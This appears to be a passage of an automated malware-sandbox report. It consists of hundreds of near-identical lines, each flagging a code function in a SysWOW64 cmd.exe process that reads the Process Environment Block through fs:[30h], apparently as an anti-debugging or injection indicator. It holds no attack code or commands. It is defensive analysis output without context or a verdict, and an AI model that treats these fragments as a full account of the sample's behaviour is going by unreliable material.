Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03180283 mov eax, dword ptr fs:[00000030h] 12_2_03180283
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03180283 mov eax, dword ptr fs:[00000030h] 12_2_03180283
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03180283 mov eax, dword ptr fs:[00000030h] 12_2_03180283
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031102A0 mov eax, dword ptr fs:[00000030h] 12_2_031102A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031102A0 mov eax, dword ptr fs:[00000030h] 12_2_031102A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h] 12_2_031962A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031962A0 mov ecx, dword ptr fs:[00000030h] 12_2_031962A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h] 12_2_031962A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h] 12_2_031962A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h] 12_2_031962A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031962A0 mov eax, dword ptr fs:[00000030h] 12_2_031962A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D62D6 mov eax, dword ptr fs:[00000030h] 12_2_031D62D6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h] 12_2_0310A2C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h] 12_2_0310A2C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h] 12_2_0310A2C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h] 12_2_0310A2C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310A2C3 mov eax, dword ptr fs:[00000030h] 12_2_0310A2C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h] 12_2_031102E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h] 12_2_031102E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031102E1 mov eax, dword ptr fs:[00000030h] 12_2_031102E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AA118 mov ecx, dword ptr fs:[00000030h] 12_2_031AA118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h] 12_2_031AA118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h] 12_2_031AA118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AA118 mov eax, dword ptr fs:[00000030h] 12_2_031AA118
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C0115 mov eax, dword ptr fs:[00000030h] 12_2_031C0115
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov eax, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031AE10E mov ecx, dword ptr fs:[00000030h] 12_2_031AE10E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03130124 mov eax, dword ptr fs:[00000030h] 12_2_03130124
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03198158 mov eax, dword ptr fs:[00000030h] 12_2_03198158
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106154 mov eax, dword ptr fs:[00000030h] 12_2_03106154
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03106154 mov eax, dword ptr fs:[00000030h] 12_2_03106154
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FC156 mov eax, dword ptr fs:[00000030h] 12_2_030FC156
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03194144 mov eax, dword ptr fs:[00000030h] 12_2_03194144
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03194144 mov eax, dword ptr fs:[00000030h] 12_2_03194144
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03194144 mov ecx, dword ptr fs:[00000030h] 12_2_03194144
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03194144 mov eax, dword ptr fs:[00000030h] 12_2_03194144
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03194144 mov eax, dword ptr fs:[00000030h] 12_2_03194144
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4164 mov eax, dword ptr fs:[00000030h] 12_2_031D4164
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4164 mov eax, dword ptr fs:[00000030h] 12_2_031D4164
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318019F mov eax, dword ptr fs:[00000030h] 12_2_0318019F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318019F mov eax, dword ptr fs:[00000030h] 12_2_0318019F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318019F mov eax, dword ptr fs:[00000030h] 12_2_0318019F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318019F mov eax, dword ptr fs:[00000030h] 12_2_0318019F
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03140185 mov eax, dword ptr fs:[00000030h] 12_2_03140185
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BC188 mov eax, dword ptr fs:[00000030h] 12_2_031BC188
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031BC188 mov eax, dword ptr fs:[00000030h] 12_2_031BC188
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h] 12_2_030FA197
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h] 12_2_030FA197
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FA197 mov eax, dword ptr fs:[00000030h] 12_2_030FA197
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A4180 mov eax, dword ptr fs:[00000030h] 12_2_031A4180
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A4180 mov eax, dword ptr fs:[00000030h] 12_2_031A4180
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0317E1D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0317E1D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E1D0 mov ecx, dword ptr fs:[00000030h] 12_2_0317E1D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0317E1D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E1D0 mov eax, dword ptr fs:[00000030h] 12_2_0317E1D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C61C3 mov eax, dword ptr fs:[00000030h] 12_2_031C61C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C61C3 mov eax, dword ptr fs:[00000030h] 12_2_031C61C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031301F8 mov eax, dword ptr fs:[00000030h] 12_2_031301F8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D61E5 mov eax, dword ptr fs:[00000030h] 12_2_031D61E5
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h] 12_2_0311E016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h] 12_2_0311E016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h] 12_2_0311E016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E016 mov eax, dword ptr fs:[00000030h] 12_2_0311E016
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03184000 mov ecx, dword ptr fs:[00000030h] 12_2_03184000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A2000 mov eax, dword ptr fs:[00000030h] 12_2_031A2000
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03196030 mov eax, dword ptr fs:[00000030h] 12_2_03196030
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FA020 mov eax, dword ptr fs:[00000030h] 12_2_030FA020
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FC020 mov eax, dword ptr fs:[00000030h] 12_2_030FC020
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03102050 mov eax, dword ptr fs:[00000030h] 12_2_03102050
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03186050 mov eax, dword ptr fs:[00000030h] 12_2_03186050
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312C073 mov eax, dword ptr fs:[00000030h] 12_2_0312C073
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310208A mov eax, dword ptr fs:[00000030h] 12_2_0310208A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C60B8 mov eax, dword ptr fs:[00000030h] 12_2_031C60B8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C60B8 mov ecx, dword ptr fs:[00000030h] 12_2_031C60B8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030F80A0 mov eax, dword ptr fs:[00000030h] 12_2_030F80A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031980A8 mov eax, dword ptr fs:[00000030h] 12_2_031980A8
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031820DE mov eax, dword ptr fs:[00000030h] 12_2_031820DE
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031420F0 mov ecx, dword ptr fs:[00000030h] 12_2_031420F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FA0E3 mov ecx, dword ptr fs:[00000030h] 12_2_030FA0E3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031860E0 mov eax, dword ptr fs:[00000030h] 12_2_031860E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031080E9 mov eax, dword ptr fs:[00000030h] 12_2_031080E9
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FC0F0 mov eax, dword ptr fs:[00000030h] 12_2_030FC0F0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100710 mov eax, dword ptr fs:[00000030h] 12_2_03100710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03130710 mov eax, dword ptr fs:[00000030h] 12_2_03130710
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313C700 mov eax, dword ptr fs:[00000030h] 12_2_0313C700
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317C730 mov eax, dword ptr fs:[00000030h] 12_2_0317C730
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313273C mov eax, dword ptr fs:[00000030h] 12_2_0313273C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313273C mov ecx, dword ptr fs:[00000030h] 12_2_0313273C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313273C mov eax, dword ptr fs:[00000030h] 12_2_0313273C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313C720 mov eax, dword ptr fs:[00000030h] 12_2_0313C720
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313C720 mov eax, dword ptr fs:[00000030h] 12_2_0313C720
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03100750 mov eax, dword ptr fs:[00000030h] 12_2_03100750
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142750 mov eax, dword ptr fs:[00000030h] 12_2_03142750
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142750 mov eax, dword ptr fs:[00000030h] 12_2_03142750
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318E75D mov eax, dword ptr fs:[00000030h] 12_2_0318E75D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03184755 mov eax, dword ptr fs:[00000030h] 12_2_03184755
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313674D mov esi, dword ptr fs:[00000030h] 12_2_0313674D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313674D mov eax, dword ptr fs:[00000030h] 12_2_0313674D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313674D mov eax, dword ptr fs:[00000030h] 12_2_0313674D
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108770 mov eax, dword ptr fs:[00000030h] 12_2_03108770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110770 mov eax, dword ptr fs:[00000030h] 12_2_03110770
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031A678E mov eax, dword ptr fs:[00000030h] 12_2_031A678E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031B47A0 mov eax, dword ptr fs:[00000030h] 12_2_031B47A0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031007AF mov eax, dword ptr fs:[00000030h] 12_2_031007AF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310C7C0 mov eax, dword ptr fs:[00000030h] 12_2_0310C7C0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031807C3 mov eax, dword ptr fs:[00000030h] 12_2_031807C3
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031047FB mov eax, dword ptr fs:[00000030h] 12_2_031047FB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031047FB mov eax, dword ptr fs:[00000030h] 12_2_031047FB
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0318E7E1 mov eax, dword ptr fs:[00000030h] 12_2_0318E7E1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031227ED mov eax, dword ptr fs:[00000030h] 12_2_031227ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031227ED mov eax, dword ptr fs:[00000030h] 12_2_031227ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031227ED mov eax, dword ptr fs:[00000030h] 12_2_031227ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03142619 mov eax, dword ptr fs:[00000030h] 12_2_03142619
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311260B mov eax, dword ptr fs:[00000030h] 12_2_0311260B
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E609 mov eax, dword ptr fs:[00000030h] 12_2_0317E609
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03136620 mov eax, dword ptr fs:[00000030h] 12_2_03136620
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03138620 mov eax, dword ptr fs:[00000030h] 12_2_03138620
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311E627 mov eax, dword ptr fs:[00000030h] 12_2_0311E627
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0310262C mov eax, dword ptr fs:[00000030h] 12_2_0310262C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0311C640 mov eax, dword ptr fs:[00000030h] 12_2_0311C640
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03132674 mov eax, dword ptr fs:[00000030h] 12_2_03132674
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C866E mov eax, dword ptr fs:[00000030h] 12_2_031C866E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031C866E mov eax, dword ptr fs:[00000030h] 12_2_031C866E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A660 mov eax, dword ptr fs:[00000030h] 12_2_0313A660
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A660 mov eax, dword ptr fs:[00000030h] 12_2_0313A660
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104690 mov eax, dword ptr fs:[00000030h] 12_2_03104690
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03104690 mov eax, dword ptr fs:[00000030h] 12_2_03104690
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031366B0 mov eax, dword ptr fs:[00000030h] 12_2_031366B0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313C6A6 mov eax, dword ptr fs:[00000030h] 12_2_0313C6A6
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A6C7 mov ebx, dword ptr fs:[00000030h] 12_2_0313A6C7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A6C7 mov eax, dword ptr fs:[00000030h] 12_2_0313A6C7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h] 12_2_0317E6F2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h] 12_2_0317E6F2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h] 12_2_0317E6F2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0317E6F2 mov eax, dword ptr fs:[00000030h] 12_2_0317E6F2
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031806F1 mov eax, dword ptr fs:[00000030h] 12_2_031806F1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031806F1 mov eax, dword ptr fs:[00000030h] 12_2_031806F1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03196500 mov eax, dword ptr fs:[00000030h] 12_2_03196500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031D4500 mov eax, dword ptr fs:[00000030h] 12_2_031D4500
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 mov eax, dword ptr fs:[00000030h] 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 mov eax, dword ptr fs:[00000030h] 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 mov eax, dword ptr fs:[00000030h] 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 mov eax, dword ptr fs:[00000030h] 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 mov eax, dword ptr fs:[00000030h] 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03110535 mov eax, dword ptr fs:[00000030h] 12_2_03110535
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h] 12_2_0312E53E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h] 12_2_0312E53E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h] 12_2_0312E53E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h] 12_2_0312E53E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E53E mov eax, dword ptr fs:[00000030h] 12_2_0312E53E
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108550 mov eax, dword ptr fs:[00000030h] 12_2_03108550
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03108550 mov eax, dword ptr fs:[00000030h] 12_2_03108550
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313656A mov eax, dword ptr fs:[00000030h] 12_2_0313656A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313656A mov eax, dword ptr fs:[00000030h] 12_2_0313656A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313656A mov eax, dword ptr fs:[00000030h] 12_2_0313656A
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E59C mov eax, dword ptr fs:[00000030h] 12_2_0313E59C
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03102582 mov eax, dword ptr fs:[00000030h] 12_2_03102582
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03102582 mov ecx, dword ptr fs:[00000030h] 12_2_03102582
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03134588 mov eax, dword ptr fs:[00000030h] 12_2_03134588
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031245B1 mov eax, dword ptr fs:[00000030h] 12_2_031245B1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031245B1 mov eax, dword ptr fs:[00000030h] 12_2_031245B1
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h] 12_2_031805A7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h] 12_2_031805A7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031805A7 mov eax, dword ptr fs:[00000030h] 12_2_031805A7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031065D0 mov eax, dword ptr fs:[00000030h] 12_2_031065D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A5D0 mov eax, dword ptr fs:[00000030h] 12_2_0313A5D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313A5D0 mov eax, dword ptr fs:[00000030h] 12_2_0313A5D0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E5CF mov eax, dword ptr fs:[00000030h] 12_2_0313E5CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313E5CF mov eax, dword ptr fs:[00000030h] 12_2_0313E5CF
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_031025E0 mov eax, dword ptr fs:[00000030h] 12_2_031025E0
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0312E5E7 mov eax, dword ptr fs:[00000030h] 12_2_0312E5E7
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313C5ED mov eax, dword ptr fs:[00000030h] 12_2_0313C5ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_0313C5ED mov eax, dword ptr fs:[00000030h] 12_2_0313C5ED
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03138402 mov eax, dword ptr fs:[00000030h] 12_2_03138402
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03138402 mov eax, dword ptr fs:[00000030h] 12_2_03138402
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_03138402 mov eax, dword ptr fs:[00000030h] 12_2_03138402
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FC427 mov eax, dword ptr fs:[00000030h] 12_2_030FC427
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h] 12_2_030FE420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h] 12_2_030FE420
Source: C:\Windows\SysWOW64\cmd.exe Code function: 12_2_030FE420 mov eax, dword ptr fs:[00000030h] 12_2_030FE420
